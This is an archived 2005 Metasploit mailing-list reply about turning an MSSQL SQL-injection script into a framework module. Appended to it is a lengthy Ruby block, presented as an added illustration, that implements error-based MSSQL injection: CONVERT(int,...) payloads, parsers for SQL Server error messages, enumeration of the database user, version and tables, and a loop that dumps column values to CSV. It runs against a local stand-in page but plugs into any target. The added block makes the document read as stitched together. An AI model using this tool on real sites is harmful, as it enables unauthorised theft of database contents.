Metasploit mailing list archives
using Meterpreter , out of MSF // SQL Injection module
From: mmiller at hick.org (mmiller at hick.org)
Date: Sun, 30 Oct 2005 02:21:25 -0600
On Sun, Oct 30, 2005 at 10:02:23AM +0200, RaMatkal wrote:
> The script was developed a while ago to automatically exploit SQL injection vulns on MSSQL. Basically it works as follows:
>
> A- Determines USER connected to the database
> B- Determines DB version
> C- Enumerates table and col names
> D- Saves first x rows of selected tables into .csv files
>
> The script could easily be extended to a variety of other things, such as using extended stored procedures to read/write from the remote fs and execute commands.
>
> The problem I see implementing it in metasploit is twofold:
>
> i) Different apps/servers return different error messages and so metasploit would need some sort of variable which would define how to extract the relevant information from the error message. This is currently done manually by editing the perl script and tweaking it for different servers/apps...sometimes it takes a couple of minutes to get it right....
Well, one way to implement this would be to provide some sort of abstract class that allows you to define a common interface to the SQL injection tasks that can be shared and overridden by derived classes that have an app-specific or server-specific error message handler. You could then just basically have either a hierarchical or linear search asking each of the (potentially ranked) classes which would be most likely capable of handling the specific error format. This sort of approach actually plays quite well into msf 3.0's recon modules that are designed to be extensible and sharable in nature.
> ii) The reason I have not released the script is for fear of script kiddies....the amount of sites which are vulnerable to SQL injection is still extremely high....a search on google for ".asp?id=1" reveals thousands upon thousands of sites which could easily be exploited.....
Always a valid concern. I think it's fair to not release something if the potential for abuse is high. Unfortunately, there is no universal answer :)
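The abstract-handler design sketched in the reply above, worked through for the four steps RaMatkal lists, as an added example: this is my own illustration, not code from the thread, from Metasploit, or from RaMatkal's Perl script. It is in Ruby because that is what msf 3.0 is written in. The class and method names, the RANK values, and the stand-in vulnerable page are all assumptions; the MSSQL error wordings, the CONVERT(int, ...) echo trick and the TOP 1 ... NOT IN row walk are real techniques.

```ruby
require 'cgi'
require 'csv'

# Abstract base (assumed design, not Metasploit's API): the interface the dispatcher
# talks to. Derived classes set RE/RANK for the error wording they understand and
# override extract when a plain regex capture is not enough.
class SqliErrorHandler
  RE   = nil   # pattern whose first group captures the leaked value
  RANK = 0     # how strongly this handler bids for a page it recognises

  def score(body) # 0 means "cannot parse this page"
    self.class::RE && body.match?(self.class::RE) ? self.class::RANK : 0
  end

  def extract(body) # leaked value, or nil
    self.class::RE && body[self.class::RE, 1]
  end

  # Shared MSSQL trick: forcing a string into an int conversion makes the
  # server echo that string inside its error message.
  def self.probe(subquery)
    "' AND 1=CONVERT(int,(#{subquery}))--"
  end
end

class Mssql2000Handler < SqliErrorHandler # SQL Server 2000 wording
  RE   = /Syntax error converting the nvarchar value '([^']*)' to a column of data type int/
  RANK = 80
end

class Mssql2005Handler < SqliErrorHandler # SQL Server 2005+ wording
  RE   = /Conversion failed when converting the nvarchar value '([^']*)' to data type int/
  RANK = 90
end

# Classic ASP behind the ODBC driver: driver prefix, quotes usually HTML-encoded.
class OdbcAspHandler < SqliErrorHandler
  RE   = /\[ODBC SQL Server Driver\]\[SQL Server\].*?value (?:'|&#39;)(.*?)(?:'|&#39;) to /
  RANK = 95

  def extract(body)
    v = super
    v && CGI.unescapeHTML(v)
  end
end

HANDLERS = [Mssql2000Handler.new, Mssql2005Handler.new, OdbcAspHandler.new].freeze

# Linear search over the ranked handlers: highest non-zero score wins, else nil.
def pick_handler(body, handlers = HANDLERS)
  handlers.map { |h| [h.score(body), h] }.select { |s, _| s > 0 }.max_by(&:first)&.last
end

# Steps A-C from the thread, as subqueries for the CONVERT() probe.
STEPS = { user:    'SELECT SYSTEM_USER',
          version: 'SELECT @@version',
          table:   "SELECT TOP 1 name FROM sysobjects WHERE xtype='U'" }.freeze

def enumerate(app, handlers = HANDLERS)
  STEPS.each_with_object({}) do |(key, sub), out|
    body = app.call(SqliErrorHandler.probe(sub))
    h = pick_handler(body, handlers)
    out[key] = h && h.extract(body)
  end
end

# Step D: walk the first n values of a column (TOP 1 ... NOT IN) into CSV text.
def dump_column(app, table, col, n, handlers = HANDLERS)
  seen = []
  n.times do
    quoted = seen.map { |v| "'#{v.gsub("'", "''")}'" }.join(',')
    sub = "SELECT TOP 1 #{col} FROM #{table}"
    sub += " WHERE #{col} NOT IN (#{quoted})" unless seen.empty?
    body = app.call(SqliErrorHandler.probe(sub))
    h = pick_handler(body, handlers)
    v = h && h.extract(body)
    break if v.nil?
    seen << v
  end
  CSV.generate { |csv| seen.each { |v| csv << [v] } }
end

# Constructed stand-in for a vulnerable classic-ASP page (no network): answers
# the probes the way such a page echoes the leaked value in its error output.
FAKE_DB = { 'SELECT SYSTEM_USER' => 'dbo',
            'SELECT @@version'   => 'Microsoft SQL Server  2000 - 8.00.194',
            "SELECT TOP 1 name FROM sysobjects WHERE xtype='U'" => 'customers' }.freeze
FAKE_ROWS = { 'customers.name' => %w[alice bob carol] }.freeze

FAKE_ASP_APP = lambda do |payload|
  sub = payload[/CONVERT\(int,\((.*)\)\)--\z/, 1].to_s
  val = FAKE_DB[sub]
  if val.nil? && (m = sub.match(/\ASELECT TOP 1 (\w+) FROM (\w+)(?: WHERE \1 NOT IN \((.*)\))?\z/))
    excl = m[3].to_s.scan(/'((?:[^']|'')*)'/).flatten.map { |s| s.gsub("''", "'") }
    val = (FAKE_ROWS["#{m[2]}.#{m[1]}"] || []).find { |r| !excl.include?(r) }
  end
  return 'HTTP/1.1 500 Internal Server Error' if val.nil? # nothing leaked: generic error page
  "Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br>" \
  "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting " \
  "the nvarchar value &#39;#{val}&#39; to a column of data type int.<br>"
end
```

Adding support for a new app or server means adding one derived class, which is the point of the abstract interface: the enumeration logic never changes. The ranking only matters when several handlers recognise the same page (here the ODBC wrapper outbids the raw 2000 wording it contains); when no handler scores above zero, for instance because the site serves a custom error page, every step returns nil and the walk stops rather than recording junk.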